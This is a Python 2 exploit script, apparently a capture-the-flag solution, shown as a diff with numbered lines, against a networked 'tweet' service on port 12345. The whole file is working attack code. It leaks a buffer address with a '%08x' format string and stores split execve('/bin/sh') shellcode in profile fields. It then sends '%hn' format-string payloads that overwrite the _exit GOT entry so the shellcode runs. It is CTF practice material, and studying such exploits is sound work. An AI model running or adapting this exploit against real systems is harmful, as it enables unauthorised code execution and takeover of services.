1 | # -*- coding: utf-8 -*- | |
2 | import socket | |
3 | import struct | |
4 | ||
5 | target_ip = "serv" | |
6 | target_port = 12345 | |
7 | ||
8 | ''' | |
9 | len of first part of the shellcode should be < 20 | |
10 | we use \xeb\x01 (jmp+1) to join the two parts | |
11 | of the shellcode | |
12 | ||
13 | for this chall a bind shellcode is more appropriate than | |
14 | a /bin/sh | |
15 | ||
16 | xor %eax,%eax | |
17 | push %eax | |
18 | push $0x68732f2f | |
19 | push $0x6e69622f | |
20 | mov %esp,%ebx | |
21 | push %eax | |
22 | push %ebx | |
23 | mov %esp,%ecx | |
24 | mov $0xb,%al | |
25 | int $0x80 | |
26 | char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" | |
27 | "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
28 | ''' | |
29 | ||
30 | sc1 = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xeb\x01" | |
31 | sc2 = "\x89\xe1\xb0\x0b\xcd\x80" | |
32 | ||
33 | sc_status = "AAAA" + "\n" | |
34 | ||
35 | sk = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) | |
36 | sk.connect((target_ip, target_port)) | |
37 | ||
38 | # welcome | |
39 | print sk.recv(4096) | |
40 | ||
41 | # send nick | |
42 | nick = "jojo\n" | |
43 | sk.send(nick) | |
44 | print sk.recv(4096) | |
45 | ||
46 | # retrieve buffer addr : | |
47 | tweet = "\x32"+"\n" | |
48 | sk.send(tweet) | |
49 | print sk.recv(4096) | |
50 | ||
51 | # mem leak | |
52 | mem_leak = "%08x\n" | |
53 | sk.send(mem_leak) | |
54 | data = sk.recv(4096) | |
55 | ||
56 | addr_pos = data.find("\x0a\x0a\x0a") | |
57 | ||
58 | addr_buf_str = data[addr_pos+3:addr_pos+3+8].decode("hex") | |
59 | ||
60 | addr_buff = struct.unpack(">I", addr_buf_str)[0] | |
61 | print "buffer_addr = " + hex(addr_buff) | |
62 | ||
63 | # we put our shellcode divided in two parts | |
64 | # edit profile | |
65 | cmd = "\x31"+"\n" | |
66 | sk.send(cmd) | |
67 | print sk.recv(4096) | |
68 | ||
69 | # send nick sc | |
70 | sk.send(sc1) | |
71 | print sk.recv(4096) | |
72 | ||
73 | # send website sc | |
74 | sk.send(sc2) | |
75 | print sk.recv(4096) | |
76 | ||
77 | # send status sc | |
78 | sk.send(sc_status) | |
79 | print sk.recv(4096) | |
80 | ||
81 | tweet = "\x32"+"\n" | |
82 | sk.send(tweet) | |
83 | print sk.recv(4096) | |
84 | ||
85 | tweet = "\x32"+"\n" | |
86 | sk.send(tweet) | |
87 | print sk.recv(4096) | |
88 | ||
89 | addr_high = addr_buff >> 16 | |
90 | addr_low = addr_buff & 0xFFFF | |
91 | ||
92 | print "addr_high = " + hex(addr_high) | |
93 | print "addr_low = " + hex(addr_low) | |
94 | ||
95 | # send fmt_string | |
96 | # use twice printf format string | |
97 | # HIGH(@_exit) = 0x8049bfe | |
98 | # LOW(@_exit) = 0x8049bfc | |
99 | # rewrite _exit with addr_buff | |
100 | fmt_string = "aa" + struct.pack("<I", 0x8049bfc) + "%" + str(addr_low-6) + "c%5$hn\n" | |
101 | sk.send(fmt_string) | |
102 | print sk.recv(4096) | |
103 | print data | |
104 | tweet = "\x32"+"\n" | |
105 | sk.send(tweet) | |
106 | print sk.recv(4096) | |
107 | fmt_string = "aa" + struct.pack("<I", 0x8049bfe) + "%" + str(addr_high-6) + "c%5$hn\n" | |
108 | sk.send(fmt_string) | |
109 | print sk.recv(4096) | |
110 | ||
111 | print "launch shellcode -> call _exit" | |
112 | ||
113 | - | raw_input("wait") |
113 | + | |
114 | sk.send(tweet) | |
115 | print sk.recv(4096) | |
116 | ||
117 | sk.close() |